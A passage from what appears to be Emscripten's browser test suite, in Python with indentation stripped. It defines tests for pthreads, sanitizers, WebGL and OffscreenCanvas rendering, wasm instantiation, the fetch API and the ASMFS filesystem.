self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
# Tests that spawning a new thread does not cause a reinitialization of the global data section of the application memory area.
@requires_threads
def test_pthread_global_data_initialization(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
for args in [['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')], ['-O3']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'PTHREAD_POOL_SIZE'])
@requires_threads
@requires_sync_compilation
def test_pthread_global_data_initialization_in_sync_compilation_mode(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
args = ['-s', 'WASM_ASYNC_COMPILATION=0']
self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'PTHREAD_POOL_SIZE'])
# Test that emscripten_get_now() reports coherent wallclock times across all pthreads, instead of each pthread independently reporting wallclock times since the launch of that pthread.
@requires_threads
def test_pthread_clock_drift(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_clock_drift.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
def test_pthread_utf8_funcs(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_utf8_funcs.cpp'), expected='0', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test the emscripten_futex_wake(addr, INT_MAX); functionality to wake all waiters
@requires_threads
def test_pthread_wake_all(self):
self.btest(path_from_root('tests', 'pthread', 'test_futex_wake_all.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'INITIAL_MEMORY=64MB', '-s', 'NO_EXIT_RUNTIME'], also_asmjs=True)
# Test that stack base and max correctly bound the stack on pthreads.
@requires_threads
def test_pthread_stack_bounds(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_stack_bounds.cpp'), expected='1', args=['-s', 'USE_PTHREADS'])
# Test that real `thread_local` works.
@requires_threads
def test_pthread_tls(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_tls.cpp'), expected='1337', args=['-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
# Test that real `thread_local` works in main thread without PROXY_TO_PTHREAD.
@requires_threads
def test_pthread_tls_main(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_tls_main.cpp'), expected='1337', args=['-s', 'USE_PTHREADS'])
@requires_threads
def test_pthread_safe_stack(self):
# Note that as the test runs with PROXY_TO_PTHREAD, we set TOTAL_STACK,
# and not DEFAULT_PTHREAD_STACK_SIZE, as the pthread for main() gets the
# same stack size as the main thread normally would.
self.btest(path_from_root('tests', 'core', 'test_safe_stack.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'STACK_OVERFLOW_CHECK=2', '-s', 'TOTAL_STACK=64KB', '--pre-js', path_from_root('tests', 'pthread', 'test_safe_stack.js')])
@parameterized({
'leak': ['test_pthread_lsan_leak', ['-g4']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_lsan(self, name, args=[]):
self.btest(path_from_root('tests', 'pthread', name + '.cpp'), expected='1', args=['-fsanitize=leak', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', path_from_root('tests', 'pthread', name + '.js')] + args)
@parameterized({
# Reusing the LSan test files for ASan.
'leak': ['test_pthread_lsan_leak', ['-g4']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_asan(self, name, args=[]):
self.btest(path_from_root('tests', 'pthread', name + '.cpp'), expected='1', args=['-fsanitize=address', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', path_from_root('tests', 'pthread', name + '.js')] + args)
@requires_threads
def test_pthread_asan_use_after_free(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_asan_use_after_free.cpp'), expected='1', args=['-fsanitize=address', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', path_from_root('tests', 'pthread', 'test_pthread_asan_use_after_free.js')])
@requires_threads
def test_pthread_exit_process(self):
args = ['-s', 'USE_PTHREADS',
'-s', 'PROXY_TO_PTHREAD',
'-s', 'PTHREAD_POOL_SIZE=2',
'-s', 'EXIT_RUNTIME',
'-DEXIT_RUNTIME',
'-O0']
args += ['--pre-js', path_from_root('tests', 'core', 'pthread', 'test_pthread_exit_runtime.pre.js')]
self.btest(path_from_root('tests', 'core', 'pthread', 'test_pthread_exit_runtime.c'), expected='onExit status: 42', args=args)
@requires_threads
def test_pthread_no_exit_process(self):
# Same as above but without EXIT_RUNTIME. In this case we don't expect onExit to
# ever be called.
args = ['-s', 'USE_PTHREADS',
'-s', 'PROXY_TO_PTHREAD',
'-s', 'PTHREAD_POOL_SIZE=2',
'-O0']
args += ['--pre-js', path_from_root('tests', 'core', 'pthread', 'test_pthread_exit_runtime.pre.js')]
self.btest(path_from_root('tests', 'core', 'pthread', 'test_pthread_exit_runtime.c'), expected='43', args=args)
# Tests MAIN_THREAD_EM_ASM_INT() function call signatures.
def test_main_thread_em_asm_signatures(self):
self.btest_exit(path_from_root('tests', 'core', 'test_em_asm_signatures.cpp'), expected='121', args=[])
@requires_threads
def test_main_thread_em_asm_signatures_pthreads(self):
self.btest_exit(path_from_root('tests', 'core', 'test_em_asm_signatures.cpp'), expected='121', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'ASSERTIONS'])
@requires_threads
def test_main_thread_async_em_asm(self):
self.btest_exit(path_from_root('tests', 'core', 'test_main_thread_async_em_asm.cpp'), expected=0, args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'ASSERTIONS'])
@requires_threads
def test_main_thread_em_asm_blocking(self):
create_test_file('page.html',
open(path_from_root('tests', 'browser', 'test_em_asm_blocking.html')).read())
self.compile_btest([path_from_root('tests', 'browser', 'test_em_asm_blocking.cpp'), '-O2', '-o', 'wasm.js', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
self.run_browser('page.html', '', '/report_result?8')
# Test that it is possible to send a signal via calling alarm(timeout), which in turn calls to the signal handler set by signal(SIGALRM, func);
def test_sigalrm(self):
self.btest(path_from_root('tests', 'sigalrm.cpp'), expected='0', args=['-O3'])
def test_canvas_style_proxy(self):
self.btest('canvas_style_proxy.c', expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests/canvas_style_proxy_shell.html'), '--pre-js', path_from_root('tests/canvas_style_proxy_pre.js')])
def test_canvas_size_proxy(self):
self.btest(path_from_root('tests', 'canvas_size_proxy.c'), expected='0', args=['--proxy-to-worker'])
def test_custom_messages_proxy(self):
self.btest(path_from_root('tests', 'custom_messages_proxy.c'), expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests', 'custom_messages_proxy_shell.html'), '--post-js', path_from_root('tests', 'custom_messages_proxy_postjs.js')])
def test_vanilla_html_when_proxying(self):
for opts in [0, 1, 2]:
print(opts)
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.js', '-O' + str(opts), '--proxy-to-worker'])
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
def test_in_flight_memfile_request(self):
# test the XHR for an asm.js mem init file being in flight already
for o in [0, 1, 2]:
print(o)
opts = ['-O' + str(o), '-s', 'WASM=0']
print('plain html')
self.compile_btest([path_from_root('tests', 'in_flight_memfile_request.c'), '-o', 'test.js'] + opts)
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0') # never when we provide our own HTML like this.
print('default html')
self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+)
@requires_sync_compilation
def test_binaryen_async(self):
# notice when we use async compilation
script = '''
<script>
// note if we do async compilation
var real_wasm_instantiate = WebAssembly.instantiate;
var real_wasm_instantiateStreaming = WebAssembly.instantiateStreaming;
if (typeof real_wasm_instantiateStreaming === 'function') {
WebAssembly.instantiateStreaming = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiateStreaming(a, b);
};
} else {
WebAssembly.instantiate = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiate(a, b);
};
}
// show stderr for the viewer's fun
err = function(x) {
out('<<< ' + x + ' >>>');
console.log(x);
};
</script>
{{{ SCRIPT }}}
'''
shell_with_script('shell.html', 'shell.html', script)
common_args = ['--shell-file', 'shell.html']
for opts, expect in [
([], 1),
(['-O1'], 1),
(['-O2'], 1),
(['-O3'], 1),
(['-s', 'WASM_ASYNC_COMPILATION'], 1), # force it on
(['-O1', '-s', 'WASM_ASYNC_COMPILATION=0'], 0), # force it off
]:
print(opts, expect)
self.btest_exit('binaryen_async.c', expected=expect, args=common_args + opts)
# Ensure that compilation still works and is async without instantiateStreaming available
no_streaming = ' <script> WebAssembly.instantiateStreaming = undefined;</script>'
shell_with_script('shell.html', 'shell.html', no_streaming + script)
self.btest_exit('binaryen_async.c', expected=1, args=common_args)
# Test that implementing Module.instantiateWasm() callback works.
def test_manual_wasm_instantiate(self):
self.compile_btest([path_from_root('tests/manual_wasm_instantiate.cpp'), '-o', 'manual_wasm_instantiate.js', '-s', 'BINARYEN'])
shutil.copyfile(path_from_root('tests', 'manual_wasm_instantiate.html'), 'manual_wasm_instantiate.html')
self.run_browser('manual_wasm_instantiate.html', 'wasm instantiation succeeded', '/report_result?1')
def test_wasm_locate_file(self):
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
ensure_dir('cdn')
create_test_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.wasm") return "cdn/test.wasm"; else return filename; }, '))
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '--shell-file', 'shell2.html', '-o', 'test.html'])
shutil.move('test.wasm', os.path.join('cdn', 'test.wasm'))
self.run_browser('test.html', '', '/report_result?0')
def test_utf8_textdecoder(self):
self.btest_exit('benchmark_utf8.cpp', 0, args=['--embed-file', path_from_root('tests/utf8_corpus.txt') + '@/utf8_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF8ToString"]'])
def test_utf16_textdecoder(self):
self.btest_exit('benchmark_utf16.cpp', 0, args=['--embed-file', path_from_root('tests/utf16_corpus.txt') + '@/utf16_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF16ToString","stringToUTF16","lengthBytesUTF16"]'])
def test_TextDecoder(self):
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=0'])
just_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0')
td_with_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=2'])
td_without_fallback = os.path.getsize('test.js')
self.assertLess(td_without_fallback, just_fallback)
self.assertLess(just_fallback, td_with_fallback)
def test_small_js_flags(self):
self.btest('browser_test_hello_world.c', '0', args=['-O3', '--closure', '1', '-s', 'INCOMING_MODULE_JS_API=[]', '-s', 'ENVIRONMENT=web'])
# Check an absolute js code size, with some slack.
size = os.path.getsize('test.js')
print('size:', size)
# Note that this size includes test harness additions (for reporting the result, etc.).
self.assertLess(abs(size - 5368), 100)
# Tests that it is possible to initialize and render WebGL content in a pthread by using OffscreenCanvas.
# -DTEST_CHAINED_WEBGL_CONTEXT_PASSING: Tests that it is possible to transfer WebGL canvas in a chain from main thread -> thread 1 -> thread 2 and then init and render WebGL content there.
@no_chrome('see https://crbug.com/961765')
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_pthread(self):
for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]:
self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL'])
# Tests that it is possible to render WebGL content on a <canvas> on the main thread, after it has once been used to render WebGL content in a pthread first
# -DTEST_MAIN_THREAD_EXPLICIT_COMMIT: Test the same (WebGL on main thread after pthread), but by using explicit .commit() to swap on the main thread instead of implicit "swap when rAF ends" logic
@requires_threads
@requires_offscreen_canvas
@disabled('This test is disabled because current OffscreenCanvas does not allow transfering it after a rendering context has been created for it.')
def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self):
for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]:
self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args + ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL'])
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_only_in_pthread(self):
self.btest('gl_only_in_pthread.cpp', expected='0', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER'])
# Tests that rendering from client side memory without default-enabling extensions works.
@requires_graphics_hardware
def test_webgl_from_client_side_memory_without_default_enabled_extensions(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1', '-DDRAW_FROM_CLIENT_MEMORY=1', '-s', 'FULL_ES2=1'])
# Tests for WEBGL_multi_draw extension
# For testing WebGL draft extensions like this, if using chrome as the browser,
# We might want to append the --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
@requires_graphics_hardware
def test_webgl_multi_draw(self):
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
# Tests for base_vertex/base_instance extension
# For testing WebGL draft extensions like this, if using chrome as the browser,
# We might want to append the --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
# If testing on Mac, you also need --use-cmd-decoder=passthrough to get this extension.
# Also there is a known bug with Mac Intel baseInstance which can fail producing the expected image result.
@requires_graphics_hardware
def test_webgl_draw_base_vertex_base_instance(self):
for multiDraw in [0, 1]:
for drawElements in [0, 1]:
self.btest('webgl_draw_base_vertex_base_instance_test.c', reference='webgl_draw_instanced_base_vertex_base_instance.png',
args=['-lGL',
'-s', 'MAX_WEBGL_VERSION=2',
'-s', 'OFFSCREEN_FRAMEBUFFER',
'-DMULTI_DRAW=' + str(multiDraw),
'-DDRAW_ELEMENTS=' + str(drawElements),
'-DEXPLICIT_SWAP=1',
'-DWEBGL_CONTEXT_VERSION=2'])
# Tests that -s OFFSCREEN_FRAMEBUFFER=1 rendering works.
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer(self):
# Tests all the different possible versions of libgl
for threads in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
for version in [[], ['-s', 'FULL_ES3'], ['-s', 'FULL_ES3']]:
args = ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1'] + threads + version
print('with args: %s' % str(args))
self.btest('webgl_draw_triangle.c', '0', args=args)
# Tests that VAOs can be used even if WebGL enableExtensionsByDefault is set to 0.
@requires_graphics_hardware
def test_webgl_vao_without_automatic_extensions(self):
self.btest('test_webgl_no_auto_init_extensions.c', '0', args=['-lGL', '-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=0'])
# Tests that offscreen framebuffer state restoration works
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer_state_restoration(self):
for args in [
# full state restoration path on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'],
# VAO path on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION'],
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=0'],
# VAO path on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-DTEST_REQUIRE_VAO=1'],
# full state restoration path on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'],
# blitFramebuffer path on WebGL 2.0 (falls back to VAO on Firefox < 67)
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=0'],
]:
cmd = args + ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1']
self.btest('webgl_offscreen_framebuffer_swap_with_bad_state.c', '0', args=cmd)
# Tests that -s WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1 rendering works.
@requires_graphics_hardware
def test_webgl_workaround_webgl_uniform_upload_bug(self):
self.btest('webgl_draw_triangle_with_uniform_color.c', '0', args=['-lGL', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'])
# Tests that using an array of structs in GL uniforms works.
@requires_graphics_hardware
def test_webgl_array_of_structs_uniform(self):
self.btest('webgl_array_of_structs_uniform.c', args=['-lGL', '-s', 'MAX_WEBGL_VERSION=2'], reference='webgl_array_of_structs_uniform.png')
# Tests that if a WebGL context is created in a pthread on a canvas that has not been transferred to that pthread, WebGL calls are then proxied to the main thread
# -DTEST_OFFSCREEN_CANVAS=1: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via using Emscripten's EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES="#canvas", then OffscreenCanvas is used
# -DTEST_OFFSCREEN_CANVAS=2: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via automatic transferring of Module.canvas when EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES is not defined, then OffscreenCanvas is also used
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_proxied_pthread(self):
for asyncify in [0, 1]:
cmd = ['-s', 'USE_PTHREADS', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL', '-s', 'GL_DEBUG', '-s', 'PROXY_TO_PTHREAD']
if asyncify:
# given the synchronous render loop here, asyncify is needed to see intermediate frames and
# the gradual color change
cmd += ['-s', 'ASYNCIFY', '-DASYNCIFY']
print(str(cmd))
self.btest('gl_in_proxy_pthread.cpp', expected='1', args=cmd)
@requires_threads
@requires_graphics_hardware
@requires_offscreen_canvas
def test_webgl_resize_offscreencanvas_from_main_thread(self):
for args1 in [[], ['-s', 'PROXY_TO_PTHREAD']]:
for args2 in [[], ['-DTEST_SYNC_BLOCKING_LOOP=1']]:
for args3 in [[], ['-s', 'OFFSCREENCANVAS_SUPPORT', '-s', 'OFFSCREEN_FRAMEBUFFER']]:
cmd = args1 + args2 + args3 + ['-s', 'USE_PTHREADS', '-lGL', '-s', 'GL_DEBUG']
print(str(cmd))
self.btest('resize_offscreencanvas_from_main_thread.cpp', expected='1', args=cmd)
@requires_graphics_hardware
def test_webgl_simple_enable_extensions(self):
for webgl_version in [1, 2]:
for simple_enable_extensions in [0, 1]:
cmd = ['-DWEBGL_CONTEXT_VERSION=' + str(webgl_version),
'-DWEBGL_SIMPLE_ENABLE_EXTENSION=' + str(simple_enable_extensions),
'-s', 'MAX_WEBGL_VERSION=2',
'-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=' + str(simple_enable_extensions),
'-s', 'GL_SUPPORT_SIMPLE_ENABLE_EXTENSIONS=' + str(simple_enable_extensions)]
self.btest('webgl2_simple_enable_extensions.c', expected='0', args=cmd)
# Tests the feature that shell html page can preallocate the typed array and place it
# to Module.buffer before loading the script page.
# In this build mode, the -s INITIAL_MEMORY=xxx option will be ignored.
# Preallocating the buffer in this was is asm.js only (wasm needs a Memory).
def test_preallocated_heap(self):
self.btest_exit('test_preallocated_heap.cpp', expected='0', args=['-s', 'WASM=0', '-s', 'INITIAL_MEMORY=16MB', '-s', 'ABORTING_MALLOC=0', '--shell-file', path_from_root('tests', 'test_preallocated_heap_shell.html')])
# Tests emscripten_fetch() usage to XHR data directly to memory without persisting results to IndexedDB.
def test_fetch_to_memory(self):
# Test error reporting in the negative case when the file URL doesn't exist. (http 404)
self.btest('fetch/to_memory.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-DFILE_DOES_NOT_EXIST'],
also_asmjs=True)
# Test the positive case when the file URL exists. (http 200)
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
for arg in [[], ['-s', 'FETCH_SUPPORT_INDEXEDDB=0']]:
self.btest('fetch/to_memory.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'] + arg,
also_asmjs=True)
def test_fetch_to_indexdb(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/to_indexeddb.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'],
also_asmjs=True)
# Tests emscripten_fetch() usage to persist an XHR into IndexedDB and subsequently load up from there.
def test_fetch_cached_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/cached_xhr.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'],
also_asmjs=True)
# Tests that response headers get set on emscripten_fetch_t values.
@requires_threads
def test_fetch_response_headers(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/response_headers.cpp', expected='1', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'], also_asmjs=True)
# Test emscripten_fetch() usage to stream a XHR in to memory without storing the full file in memory
def test_fetch_stream_file(self):
self.skipTest('moz-chunked-arraybuffer was firefox-only and has been removed')
# Strategy: create a large 128MB file, and compile with a small 16MB Emscripten heap, so that the tested file
# won't fully fit in the heap. This verifies that streaming works properly.
s = '12345678'
for i in range(14):
s = s[::-1] + s # length of str will be 2^17=128KB
with open('largefile.txt', 'w') as f:
for i in range(1024):
f.write(s)
self.btest('fetch/stream_file.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'INITIAL_MEMORY=536870912'],
also_asmjs=True)
# Tests emscripten_fetch() usage in synchronous mode when used from the main
# thread proxied to a Worker with -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_fetch_sync_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp', expected='1', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Tests emscripten_fetch() usage when user passes none of the main 3 flags (append/replace/no_download).
# In that case, in append is implicitly understood.
@requires_threads
def test_fetch_implicit_append(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Tests synchronous emscripten_fetch() usage from wasm pthread in fastcomp.
@requires_threads
def test_fetch_sync_xhr_in_wasm(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Tests that the Fetch API works for synchronous XHRs when used with --proxy-to-worker.
@requires_threads
def test_fetch_sync_xhr_in_proxy_to_worker(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '--proxy-to-worker'],
also_asmjs=True)
# Tests waiting on EMSCRIPTEN_FETCH_WAITABLE request from a worker thread
@no_wasm_backend("emscripten_fetch_wait uses an asm.js based web worker")
@requires_threads
def test_fetch_sync_fetch_in_main_thread(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_fetch_in_main_thread.cpp', expected='0', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_idb_store(self):
self.btest('fetch/idb_store.cpp', expected='0', args=['-s', 'USE_PTHREADS', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_idb_delete(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/idb_delete.cpp', expected='0', args=['-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_hello_file(self):
# Test basic file loading and the valid character set for files.
ensure_dir('dirrey')
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), os.path.join(self.get_dir(), 'dirrey', 'hello file !#$%&\'()+,-.;=@[]^_`{}~ %%.txt'))
self.btest_exit('asmfs/hello_file.cpp', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_read_file_twice(self):
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), 'hello_file.txt')
self.btest_exit('asmfs/read_file_twice.cpp', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_fopen_write(self):
self.btest_exit('asmfs/fopen_write.cpp', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_mkdir_create_unlink_rmdir(self):
self.btest('cstdio/test_remove.cpp', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_dirent_test_readdir(self):
self.btest('dirent/test_readdir.c', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_dirent_test_readdir_empty(self):
self.btest('dirent/test_readdir_empty.c', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_close(self):
self.btest_exit(path_from_root('tests', 'unistd', 'close.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_access(self):
self.btest_exit(path_from_root('tests', 'unistd', 'access.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_unlink(self):
# TODO: Once symlinks are supported, remove -DNO_SYMLINK=1
self.btest_exit(path_from_root('tests', 'unistd', 'unlink.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-DNO_SYMLINK=1'])
@requires_asmfs
@requires_threads
def test_asmfs_test_fcntl_open(self):
